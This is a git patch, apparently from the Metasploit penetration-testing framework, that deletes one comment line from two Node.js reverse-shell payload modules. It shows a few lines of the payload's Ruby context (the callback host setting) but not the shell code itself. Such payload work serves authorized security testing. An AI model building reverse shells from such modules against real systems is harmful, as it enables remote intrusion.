From a641bc41a85c72fa97b15f8a18bfc5694549fe01 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Mon, 16 Sep 2013 21:35:53 -0500 Subject: [PATCH] Kill unnecessary comment. --- modules/payloads/singles/nodejs/shell_reverse_tcp.rb | 1 - modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index e1eeba850d..da05c47ca2 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -48,7 +48,6 @@ module Metasploit3 # Returns the JS string to use for execution # def command_string - # Does anyone know of a concise way to tell if we're running on windows so that we spawn cmd? lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST'] cmd = <